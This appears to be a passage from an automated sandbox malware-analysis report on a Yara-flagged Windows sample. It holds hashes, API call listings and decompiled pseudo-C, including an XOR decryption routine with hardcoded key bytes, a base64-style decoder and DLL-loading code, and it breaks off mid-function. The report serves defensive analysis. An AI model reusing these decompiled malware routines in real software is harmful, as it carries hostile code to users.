                                                                        • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$F$H$H$I$K$K$L$O$S$X$\$^$`$a$b$g$h$n$n$q$t$t$t$u$u$w$y$y$z${$}$~
                                                                        • API String ID: 0-140969752
                                                                        • Opcode ID: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                        • Instruction ID: b3b03687bd6bacd840c90b17c05aedc23d9fa5d3dc97117df5ba02558f5b3d9c
                                                                        • Opcode Fuzzy Hash: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                        • Instruction Fuzzy Hash: 1EF1F0209087E9C9DB32C7788C097CEBE645B27324F0443DAD1E97A2D2D7B54BC58B66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Offset: 00497000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$F$H$H$I$K$K$L$O$S$X$\$^$`$a$b$g$h$n$n$q$t$t$t$u$u$w$y$y$z${$}$~
                                                                        • API String ID: 0-140969752
                                                                        • Opcode ID: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                        • Instruction ID: 06c4c55b5f7c0cabfc9a08f70ed99313b441ce6f7a1b330f367ec5fe98c38343
                                                                        • Opcode Fuzzy Hash: dbe111918d2f51ba58f9ce5963b6dd4814b8b031a5b691b88f874b4955952eea
                                                                        • Instruction Fuzzy Hash: D8F1F0209087E98DDB32C7788C097CEBE655B23324F0843D9D5E87A2D2D7B54B85CB66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00492660,0000000C,0048B177,00000000,00000000,?,?,0048A6BF,0048910E), ref: 0048B04E
                                                                        • __crt_waiting_on_module_handle.LIBCMT ref: 0048B059
                                                                          • Part of subcall function 0048A15C: Sleep.KERNEL32(000003E8,?,?,0048AF9F,KERNEL32.DLL,?,0048A6EC,?,00489108,?), ref: 0048A168
                                                                          • Part of subcall function 0048A15C: GetModuleHandleW.KERNEL32(?,?,?,0048AF9F,KERNEL32.DLL,?,0048A6EC,?,00489108,?), ref: 0048A171
                                                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0048B082
                                                                        • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0048B092
                                                                        • __lock.LIBCMT ref: 0048B0B4
                                                                        • InterlockedIncrement.KERNEL32(004934D8), ref: 0048B0C1
                                                                        • __lock.LIBCMT ref: 0048B0D5
                                                                        • ___addlocaleref.LIBCMT ref: 0048B0F3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                        • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                        • API String ID: 1028249917-2843748187
                                                                        • Opcode ID: f71737a39c52cd78a48e74ce37244a19c2382bd74f8a6e67bfcf91d1d0e296c6
                                                                        • Instruction ID: a9aaf04b4586c950861128c32e65cb89b2736f1ed5330593efd498b0f2e58603
                                                                        • Opcode Fuzzy Hash: f71737a39c52cd78a48e74ce37244a19c2382bd74f8a6e67bfcf91d1d0e296c6
                                                                        • Instruction Fuzzy Hash: 6511C370900702AEDB21AF76C801B9EBBE0AF01314F10892FE4A9937A1CB7C99418B5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 45%
                                                                        			E004660BE(signed int _a4) {
                                                                        				char _v5;
                                                                        				char _v6;
                                                                        				char _v7;
                                                                        				char _v8;
                                                                        				char _v9;
                                                                        				char _v10;
                                                                        				char _v11;
                                                                        				char _v12;
                                                                        				char _v13;
                                                                        				char _v14;
                                                                        				char _v15;
                                                                        				char _v16;
                                                                        				char _v17;
                                                                        				char _v18;
                                                                        				char _v19;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				intOrPtr _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				char _v291;
                                                                        				char _v292;
                                                                        				char _v547;
                                                                        				char _v548;
                                                                        				char _v1058;
                                                                        				char _v1060;
                                                                        				char _v1570;
                                                                        				char _v1572;
                                                                        				char* _t81;
                                                                        				char* _t82;
                                                                        				signed int _t84;
                                                                        				signed int _t85;
                                                                        				signed int _t87;
                                                                        				signed int _t89;
                                                                        				signed int _t92;
                                                                        				signed int _t97;
                                                                        				intOrPtr* _t102;
                                                                        				signed short* _t103;
                                                                        				intOrPtr _t106;
                                                                        				void* _t107;
                                                                        
                                                                        				_t85 = 0;
                                                                        				_v20 = 0xa3;
                                                                        				_v19 = 0x1e;
                                                                        				_v18 = 0xf3;
                                                                        				_v17 = 0x69;
                                                                        				_v16 = 7;
                                                                        				_v15 = 0x62;
                                                                        				_v14 = 0xd9;
                                                                        				_v13 = 0x1f;
                                                                        				_v12 = 0x1e;
                                                                        				_v11 = 0xe9;
                                                                        				_v10 = 0x35;
                                                                        				_v9 = 0x7d;
                                                                        				_v8 = 0x4f;
                                                                        				_v7 = 0xd2;
                                                                        				_v6 = 0x7d;
                                                                        				_v5 = 0x48;
                                                                        				_v292 = 0;
                                                                        				L004703F4();
                                                                        				_v548 = 0;
                                                                        				L004703F4();
                                                                        				_v1572 = 0;
                                                                        				L004703F4();
                                                                        				_v1060 = 0;
                                                                        				L004703F4();
                                                                        				_v36 = _a4 + 4;
                                                                        				_a4 = 0;
                                                                        				_v24 = 0xff;
                                                                        				 *0x412090( &_v292,  &_v24,  &_v1058, 0, 0x1fe,  &_v1570, 0, 0x1fe,  &_v547, 0, 0xff,  &_v291, 0, 0xff);
                                                                        				_v24 = 0xff;
                                                                        				 *0x412018( &_v548,  &_v24);
                                                                        				_t102 =  *0x4120d0; // 0x758dffff
                                                                        				 *_t102(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
                                                                        				 *_t102(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
                                                                        				_t81 =  &_v292;
                                                                        				_push(_t81);
                                                                        				L004703B6();
                                                                        				_v32 = _t81;
                                                                        				_t82 =  &_v548;
                                                                        				_push(_t82);
                                                                        				L004703B6();
                                                                        				_t106 = _v36;
                                                                        				_v28 = _t82;
                                                                        				_push(0x10);
                                                                        				_push( &_v20);
                                                                        				_push(_t106);
                                                                        				L0047043C();
                                                                        				_t84 = 0xba0da71d;
                                                                        				if(_v28 > 0) {
                                                                        					_t103 =  &_v1060;
                                                                        					do {
                                                                        						_t97 = _a4 & 0x80000003;
                                                                        						if(_t97 < 0) {
                                                                        							_t97 = (_t97 - 0x00000001 | 0xfffffffc) + 1;
                                                                        						}
                                                                        						_t89 = ( *_t103 & 0x0000ffff) * _t84;
                                                                        						_t84 = _t84 * 0xbc8f;
                                                                        						 *(_t106 + _t97 * 4) =  *(_t106 + _t97 * 4) ^ _t89;
                                                                        						_a4 = _a4 + 1;
                                                                        						_t103 =  &(_t103[1]);
                                                                        					} while (_a4 < _v28);
                                                                        				}
                                                                        				if(_v32 > _t85) {
                                                                        					do {
                                                                        						_t92 = _a4 & 0x80000003;
                                                                        						if(_t92 < 0) {
                                                                        							_t92 = (_t92 - 0x00000001 | 0xfffffffc) + 1;
                                                                        						}
                                                                        						_t87 = ( *(_t107 + _t85 * 2 - 0x620) & 0x0000ffff) * _t84;
                                                                        						_t84 = _t84 * 0xbc8f;
                                                                        						 *(_t106 + _t92 * 4) =  *(_t106 + _t92 * 4) ^ _t87;
                                                                        						_a4 = _a4 + 1;
                                                                        						_t85 = _t85 + 1;
                                                                        					} while (_t85 < _v32);
                                                                        				}
                                                                        				return _t84;
                                                                        			}


                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.735044023.0000000000400000.00000004.00000001.sdmp Download File
                                                                        • Associated: 00000001.00000002.735147214.0000000000482000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5$H$O$b$i$}$}
                                                                        • API String ID: 0-3760989150
                                                                        • Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                        • Instruction ID: 085fb8e70ef0eada5a1d20243ecae5196f57fe3971bb647bf342fdf5a836fb3c
                                                                        • Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                        • Instruction Fuzzy Hash: 0251DA7180025DEEDB11DBA8CC40EEEBBBCEF49314F0481EAE559E6191D3789B44CB65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Offset: 00497000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5$H$O$b$i$}$}
                                                                        • API String ID: 0-3760989150
                                                                        • Opcode ID: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                        • Instruction ID: f2bc64ad88cee6a9e767b0469ae0257665808a0ab5ce2db2a82fee9a74a0ec21
                                                                        • Opcode Fuzzy Hash: 43b2ec5c8048ec64a89d0eaefec6abc2179865d68597a24ed28c74e05bf594a1
                                                                        • Instruction Fuzzy Hash: 5151E771C0065DAEDB11CBA4CC44AFEBBBCFF49314F0442A9E559E6182D3389B85CB65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 0048CF6C
                                                                          • Part of subcall function 0048B19C: __getptd_noexit.LIBCMT ref: 0048B19F
                                                                          • Part of subcall function 0048B19C: __amsg_exit.LIBCMT ref: 0048B1AC
                                                                        • __amsg_exit.LIBCMT ref: 0048CF8C
                                                                        • __lock.LIBCMT ref: 0048CF9C
                                                                        • InterlockedDecrement.KERNEL32(?), ref: 0048CFB9
                                                                        • InterlockedIncrement.KERNEL32(021D2B88), ref: 0048CFE4
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                        • String ID:
                                                                        • API String ID: 4271482742-0
                                                                        • Opcode ID: 114407788101702029c1cf3570820ac91b4b06e623bc90de322d190a27ff3239
                                                                        • Instruction ID: f892595e6e8bc3b7f9317b1e981c58d7ef87b17b483e3ce9e4092376cc7d32d2
                                                                        • Opcode Fuzzy Hash: 114407788101702029c1cf3570820ac91b4b06e623bc90de322d190a27ff3239
                                                                        • Instruction Fuzzy Hash: F101E131A01611ABEB11BF25884575E7B61AB01715F04482BEB00A77D0C73C6D41CBEE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • __lock.LIBCMT ref: 0048B595
                                                                          • Part of subcall function 00489445: __mtinitlocknum.LIBCMT ref: 0048945B
                                                                          • Part of subcall function 00489445: __amsg_exit.LIBCMT ref: 00489467
                                                                          • Part of subcall function 00489445: RtlEnterCriticalSection.NTDLL(?), ref: 0048946F
                                                                        • ___sbh_find_block.LIBCMT ref: 0048B5A0
                                                                        • ___sbh_free_block.LIBCMT ref: 0048B5AF
                                                                        • HeapFree.KERNEL32(00000000,?,004926D0,0000000C,00489426,00000000,00492600,0000000C,00489460,?,?,?,0048D525,00000004,004927D0,0000000C), ref: 0048B5DF
                                                                        • GetLastError.KERNEL32(?,0048D525,00000004,004927D0,0000000C,0048B660,?,?,00000000,00000000,00000000,?,0048B14E,00000001,00000214), ref: 0048B5F0
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                        • String ID:
                                                                        • API String ID: 2714421763-0
                                                                        • Opcode ID: d18479402430aaefc509c439dfa1981fd13e13dfd7b7db6e0fc83a726df78f6b
                                                                        • Instruction ID: 80bad2d6a6bfc3f9f804d1c8ca66343406cc332f6b57d3fdcfd0cf5f46b783a0
                                                                        • Opcode Fuzzy Hash: d18479402430aaefc509c439dfa1981fd13e13dfd7b7db6e0fc83a726df78f6b
                                                                        • Instruction Fuzzy Hash: B601F731902705BEDF307F729C0A76E7A64DF00768F24492FF500A6690CB3C89818B9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Offset: 00497000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $/A$,/A$0/A$X7A$`7A
                                                                        • API String ID: 0-851144607
                                                                        • Opcode ID: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                        • Instruction ID: 4428056738c1ec361f974de153bb2c1ca2297caa9b4de1d09cfaf12758fc748c
                                                                        • Opcode Fuzzy Hash: 06cd360b17a7fa1d8a41615e50dbe9baf6717b8d01dc48d354ffd45ab050797b
                                                                        • Instruction Fuzzy Hash: 094182B0655642EFC3098F2AC5846C1FFE0BB09314F95C2AFC46C9B221C7B4A565CF98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Offset: 00497000, based on PE: false
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $/A$,/A$0/A$4/A$`7A
                                                                        • API String ID: 0-2435369464
                                                                        • Opcode ID: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                        • Instruction ID: 0a08b35f92fb99a00e0bf9f6e867f43e276e1d31ddc6d6f82e1f0a13e65aa554
                                                                        • Opcode Fuzzy Hash: 7df15b69b8a44822169a20d552448d7de219ebddf6a06acfaefecb02cba57f2e
                                                                        • Instruction Fuzzy Hash: 6A01F6B4000B498AC721EF61C1846D6BBF0FB45309F51C80FE0A98A204CFF8A19ACF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 0048CCD0
                                                                          • Part of subcall function 0048B19C: __getptd_noexit.LIBCMT ref: 0048B19F
                                                                          • Part of subcall function 0048B19C: __amsg_exit.LIBCMT ref: 0048B1AC
                                                                        • __getptd.LIBCMT ref: 0048CCE7
                                                                        • __amsg_exit.LIBCMT ref: 0048CCF5
                                                                        • __lock.LIBCMT ref: 0048CD05
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                        • String ID:
                                                                        • API String ID: 3521780317-0
                                                                        • Opcode ID: aff873874d459d0b2c8ad7d468af57647c14f91cfa5aaa355a2b0f9b258fcab5
                                                                        • Instruction ID: fdb5c6d65f8cd6ed5de720e99c888756382875035551d096808b3d9f95a16156
                                                                        • Opcode Fuzzy Hash: aff873874d459d0b2c8ad7d468af57647c14f91cfa5aaa355a2b0f9b258fcab5
                                                                        • Instruction Fuzzy Hash: 95F09632A007009FD721FB76844675E77E0AB41715F144D6FE544AB291CB7C5D019BAE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E0046FCFC(void* __eax, void* __edi) {
                                                                        				unsigned int _v5;
                                                                        				signed int _v6;
                                                                        				signed int _v7;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _t36;
                                                                        				void* _t55;
                                                                        				signed char _t56;
                                                                        				char* _t66;
                                                                        				void* _t67;
                                                                        				void* _t68;
                                                                        
                                                                        				_t67 = __edi;
                                                                        				_t55 = __eax;
                                                                        				_push(__eax);
                                                                        				_t68 = 0;
                                                                        				L004703B6();
                                                                        				_t36 = __eax + 0xfffffffd;
                                                                        				_v16 = _t36;
                                                                        				if(_t36 < 0) {
                                                                        					L18:
                                                                        					 *((char*)(_t68 + _t67)) = 0;
                                                                        					return _t68;
                                                                        				}
                                                                        				_v12 = 0xfffffffe;
                                                                        				_v12 = _v12 - __eax;
                                                                        				_t5 = _t55 + 2; // 0x46fe76
                                                                        				_t66 = _t5;
                                                                        				while(1) {
                                                                        					_t6 = _t66 - 2; // 0x75fff88b
                                                                        					_t38 =  *_t6;
                                                                        					if( *_t6 != 0x2e) {
                                                                        						_v6 = E0046FCC8(_t38);
                                                                        					} else {
                                                                        						_v6 = 0x3e;
                                                                        					}
                                                                        					_t9 = _t66 - 1; // 0xfc75fff8
                                                                        					_t40 =  *_t9;
                                                                        					if( *_t9 != 0x2e) {
                                                                        						_v5 = E0046FCC8(_t40);
                                                                        					} else {
                                                                        						_v5 = 0x3e;
                                                                        					}
                                                                        					_t42 =  *_t66;
                                                                        					if( *_t66 != 0x2e) {
                                                                        						_t56 = E0046FCC8(_t42);
                                                                        					} else {
                                                                        						_t56 = 0x3e;
                                                                        					}
                                                                        					_t44 =  *((intOrPtr*)(_t66 + 1));
                                                                        					if( *((intOrPtr*)(_t66 + 1)) != 0x2e) {
                                                                        						_v7 = E0046FCC8(_t44);
                                                                        					} else {
                                                                        						_v7 = 0x3e;
                                                                        					}
                                                                        					 *(_t67 + _t68) = _v5 >> 0x00000004 | _v6 << 0x00000002;
                                                                        					if( *_t66 == 0x2d) {
                                                                        						break;
                                                                        					}
                                                                        					 *(_t68 + _t67 + 1) = _t56 >> 0x00000002 | _v5 << 0x00000004;
                                                                        					if( *((char*)(_t66 + 1)) == 0x2d) {
                                                                        						 *((char*)(_t68 + _t67 + 2)) = 0;
                                                                        						_t34 = _t68 + 2; // 0x2
                                                                        						return _t34;
                                                                        					}
                                                                        					_t68 = _t68 + 3;
                                                                        					 *(_t68 + _t67 - 1) = _t56 << 0x00000006 | _v7;
                                                                        					_t25 = _t68 + 5; // 0x2
                                                                        					_t66 = _t66 + 4;
                                                                        					if(_t25 >= 0x3ff || _v12 + _t66 > _v16) {
                                                                        						goto L18;
                                                                        					} else {
                                                                        						continue;
                                                                        					}
                                                                        				}
                                                                        				 *(_t68 + _t67 + 1) = 0;
                                                                        				_t31 = _t68 + 1; // 0x1
                                                                        				return _t31;
                                                                        			}

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.735044023.0000000000400000.00000004.00000001.sdmp
                                                                        • Associated: 00000001.00000002.735147214.0000000000482000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: >$>$>$s&F
                                                                        • API String ID: 0-573601131
                                                                        • Opcode ID: 63af057b9fe0049d645aef51361d4680daff9370bba2b9f986e1d9a123f48411
                                                                        • Instruction ID: 2eac1ac47f149cc7f756bd3d5d00c452ac80f5de0da29780c2b8aa333607b310
                                                                        • Opcode Fuzzy Hash: 63af057b9fe0049d645aef51361d4680daff9370bba2b9f986e1d9a123f48411
                                                                        • Instruction Fuzzy Hash: 9831B25180D6C99ED7118A6890467EFFFA54F22308F1886ABC0D657383E26C754E879B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        C-Code - Quality: 65%
                                                                        			E00405CA0(intOrPtr __eax) {
                                                                        				intOrPtr _v8;
                                                                        				void* _v12;
                                                                        				char _v15;
                                                                        				char _v17;
                                                                        				char _v18;
                                                                        				char _v22;
                                                                        				int _v28;
                                                                        				char _v289;
                                                                        				long _t44;
                                                                        				long _t61;
                                                                        				long _t63;
                                                                        				CHAR* _t70;
                                                                        				CHAR* _t72;
                                                                        				struct HINSTANCE__* _t78;
                                                                        				struct HINSTANCE__* _t84;
                                                                        				char* _t94;
                                                                        				void* _t95;
                                                                        				intOrPtr _t99;
                                                                        				struct HINSTANCE__* _t107;
                                                                        				void* _t110;
                                                                        				void* _t112;
                                                                        				intOrPtr _t113;
                                                                        
                                                                        				_t110 = _t112;
                                                                        				_t113 = _t112 + 0xfffffee0;
                                                                        				_v8 = __eax;
                                                                        				GetModuleFileNameA(0,  &_v289, 0x105);
                                                                        				_v22 = 0;
                                                                        				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                        				if(_t44 == 0) {
                                                                        					L3:
                                                                        					_push(_t110);
                                                                        					_push(0x405da5);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t113;
                                                                        					_v28 = 5;
                                                                        					E00405AE8( &_v289, 0x105);
                                                                        					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405F0C, 0, 0,  &_v22,  &_v28) != 0) {
                                                                        						_v22 = 0;
                                                                        					}
                                                                        					_v18 = 0;
                                                                        					_pop(_t99);
                                                                        					 *[fs:eax] = _t99;
                                                                        					_push(E00405DAC);
                                                                        					return RegCloseKey(_v12);
                                                                        				} else {
                                                                        					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                        					if(_t61 == 0) {
                                                                        						goto L3;
                                                                        					} else {
                                                                        						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                                                                        						if(_t63 != 0) {
                                                                        							_push(0x105);
                                                                        							_push(_v8);
                                                                        							_push( &_v289);
                                                                        							L00401338();
                                                                        							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
                                                                        							_t107 = 0;
                                                                        							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                                                                        								_t70 =  &_v289;
                                                                        								_push(_t70);
                                                                        								L00401340();
                                                                        								_t94 = _t70 +  &_v289;
                                                                        								while( *_t94 != 0x2e && _t94 !=  &_v289) {
                                                                        									_t94 = _t94 - 1;
                                                                        								}
                                                                        								_t72 =  &_v289;
                                                                        								if(_t94 != _t72) {
                                                                        									_t95 = _t94 + 1;
                                                                        									if(_v22 != 0) {
                                                                        										_push(0x105 - _t95 - _t72);
                                                                        										_push( &_v22);
                                                                        										_push(_t95);
                                                                        										L00401338();
                                                                        										_t107 = LoadLibraryExA( &_v289, 0, 2);
                                                                        									}
                                                                        									if(_t107 == 0 && _v17 != 0) {
                                                                        										_push(0x105 - _t95 -  &_v289);
                                                                        										_push( &_v17);
                                                                        										_push(_t95);
                                                                        										L00401338();
                                                                        										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                                        										_t107 = _t78;
                                                                        										if(_t107 == 0) {
                                                                        											_v15 = 0;
                                                                        											_push(0x105 - _t95 -  &_v289);
                                                                        											_push( &_v17);
                                                                        											_push(_t95);
                                                                        											L00401338();
                                                                        											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
                                                                        											_t107 = _t84;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							return _t107;
                                                                        						} else {
                                                                        							goto L3;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}


























                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047A08C,?,00405A90,00400000,?,00000105,00000001,004104D0,00405ACC,00406578,0000FF99,?), ref: 00405CBC
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047A08C,?,00405A90,00400000,?,00000105,00000001), ref: 00405CDA
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047A08C), ref: 00405CF8
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405D16
                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D5F
                                                                        • RegQueryValueExA.ADVAPI32(?,00405F0C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001), ref: 00405D7D
                                                                        • RegCloseKey.ADVAPI32(?,00405DAC,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D9F
                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405DBC
                                                                        • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DC9
                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DCF
                                                                        • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DFA
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E41
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E51
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E79
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E89
                                                                        • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405EAF
                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405EBF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                        • API String ID: 1759228003-2375825460
                                                                        • Opcode ID: ec23df8d0093e56dbebda2ecfd83789643391fd940fb6f23ef4cd730ec7b6297
                                                                        • Instruction ID: 04e7f70bc9d5a93712b3d4866678576dafef9722c20d67039ec14452820f7b6a
                                                                        • Opcode Fuzzy Hash: ec23df8d0093e56dbebda2ecfd83789643391fd940fb6f23ef4cd730ec7b6297
                                                                        • Instruction Fuzzy Hash: D2516D71A4060C7AFB21D6A4CC46FEFBAACDB04744F5041B7BA44F65C1E6789E448FA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00455880(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
                                                                        				struct HWND__* _v8;
                                                                        				struct HWND__* _v12;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t161;
                                                                        				struct HWND__* _t162;
                                                                        				struct HWND__* _t163;
                                                                        				void* _t166;
                                                                        				struct HWND__* _t176;
                                                                        				struct HWND__* _t185;
                                                                        				struct HWND__* _t188;
                                                                        				struct HWND__* _t189;
                                                                        				struct HWND__* _t191;
                                                                        				struct HWND__* _t197;
                                                                        				struct HWND__* _t199;
                                                                        				struct HWND__* _t202;
                                                                        				struct HWND__* _t205;
                                                                        				struct HWND__* _t206;
                                                                        				struct HWND__* _t216;
                                                                        				struct HWND__* _t217;
